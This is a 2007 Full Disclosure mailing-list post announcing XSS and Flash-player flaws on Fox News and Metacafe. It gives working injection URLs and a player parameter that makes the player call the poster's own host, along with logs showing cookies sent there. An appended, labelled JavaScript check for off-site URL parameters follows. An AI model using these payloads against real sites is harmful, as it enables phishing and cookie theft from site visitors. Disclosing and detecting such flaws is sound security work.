Full Disclosure mailing list archives

0day Shockwave and Flash XSS Fish Exploits on Youtube, Revver, Metacafe, Google.
From: "XSS Worm XSS Security Information Portal" <cross-site-scripting-security () xssworm com>
Date: Sat, 10 Nov 2007 17:36:55 +1100

Foxnews 0day XSS Shock Attack
<http://www.foxnews.com/video2/launchPage.html?100207/100207_imag_PETITE&%253Ch1%253E%253Ca%2520href=//xssworm.com%253EXSS%2520Worm%2520Web%25202.0%2520Security%2520Portal%253C/a%253E%253Cbr%253E%253C/h1%253EWith%2520new%25200day%2520Fox%2520News%2520XSS%2520Hacking%2520Video!>
Demo link to send to a fish:

http://www.foxnews.com/video2/launchPage.html?http://localhost/

With netcat listening on localhost:

listening on [any] 80 ...
connect to localhost [127.0.0.1] from localhost [127.0.0.1] 1964
GET
/E05510/a3/0/3/1380/1/0/116282DDC64/0/0/00000000/312340660.gif?D=DM%5FLOC%3D
http%3A%2F%2Fwww%252Efoxnews%252Ecom%2Fvideo2%2FlaunchPage%252Ehtml%253Fhttp%3A%
2F%2Flocalhost%2526pageType%253Dmisc%2526miscPage%253DVideo%252520Launch%252520P
age%26DM%5FREF%3D%26DM%5FTIT%3DFOXNews%252Ecom%20%2D%20Video%20Launch%20Page%20%
2D%20FOXNews%252Ecom%26DM%5FEOM%3D1 HTTP/1.1
Host: pix01.revsci.net
User-Agent: Mozilla/5.0 (Mandriver)
Accept: image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.foxnews.com/video2/launchPage.html?http://localhost
*Cookie: NETID01=9mWO-Ar () 1RoAAAm1AWEAAAC5;
NETSEGS_J05532=960C7930BE970CE4&J05532
&3F149836&472757D9&0&&4723FE85&C2C6A1738F3B885FCA46DE74CFF355ED*


I think maybe this is to make many shock waves with XSS!

Zero Day Shockwave SWF Player Exploit with XSS Attack
<http://xssworm.blogvis.com/12/xssworm/zero-day-shockwave-swf-player-exploit-with-xss-attack/>
In the hacking metacafe we discover Shockwave XSS 0day attack to use by
blackhat to steal fish:

MetaCafe XSS Worm Vulnerabilities - ZeroDay Shockwave Attack POC - :

http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true
&

We see this output in the xssworm.com log:


GET /crossdomain.xml HTTP/1.1
Host: metacafe.122.2o7.net
Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0
D2D[CE];
s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[
CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE0000639DC|4726056DCE]
s_vi
_wzvqcdsx7F7×60qx7isx7Fx7D[CS]v4|.....

snips…

We see many more serious vulnerabilities in the web 2.0 today. You must be
sure to visit http://xssworm.com/ security portal to discuss this shock
problem, and many thanks for your reply. I am interested.

*vaj


-- 
Francesco Vaj [CISSP - GIAC]
CSS Security Researcher
mailto:vaj () nospam xssworm com
aim: XSS Cross Site
------
XSS Cross Site Scripting Attacks and
Web 2.0 AJAX Security Information News -
http://xssworm.com/
------
"Vaj, bella vaj."
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
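
Added example, not part of the original post or of any site's code: a server-side or proxy-side check that flags request URLs whose query components (named, like the `mediaURL` and `postrollContentURL` parameters above, or bare, like the `launchPage.html?http://...` form) point at a host outside an allowlist. The allowlist contents, the function names and the `untrusted.example` host are assumptions made for illustration.

```javascript
// Added example. ALLOWED_HOSTS is an assumed allowlist for the player's own content hosts.
const ALLOWED_HOSTS = new Set(["www.metacafe.com", "l3images.metacafe.com"]);

// Decode repeatedly (bounded) so double-encoded input such as %253C is seen in its final form.
function fullyDecode(value, maxRounds = 5) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch (e) { break; }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Host of an absolute or protocol-relative URL value, or null if the value is not one.
function externalHost(value) {
  const v = fullyDecode(value).trim();
  if (!/^([a-z][a-z0-9+.-]*:)?\/\//i.test(v)) return null;
  try {
    return new URL(v, "http://base.invalid").hostname.toLowerCase();
  } catch (e) {
    return "(unparseable)"; // looks like a URL but has a malformed host: still report it
  }
}

// List every query component (named or bare) that points at a host outside the allowlist.
function findOffsiteParams(requestUrl) {
  const query = new URL(requestUrl).search.slice(1);
  const findings = [];
  for (const part of query.split("&")) {
    if (!part) continue;
    const eq = part.indexOf("=");
    const name = eq === -1 ? "(bare query)" : fullyDecode(part.slice(0, eq));
    const host = externalHost(eq === -1 ? part : part.slice(eq + 1));
    if (host !== null && !ALLOWED_HOSTS.has(host)) findings.push({ name, host });
  }
  return findings;
}

// Constructed sample requests shaped like the two URLs in the post.
const SAMPLE_PLAYER = "http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028" +
  "&mediaURL=http://untrusted.example/?x" +
  "&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf";
const SAMPLE_BARE = "http://www.foxnews.com/video2/launchPage.html?http%3A%2F%2Funtrusted.example%2F";
console.log(findOffsiteParams(SAMPLE_PLAYER), findOffsiteParams(SAMPLE_BARE));
```

The check only covers values that start with a scheme or `//`; markup injected into the page through the query string needs output encoding at the point where the value is written.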
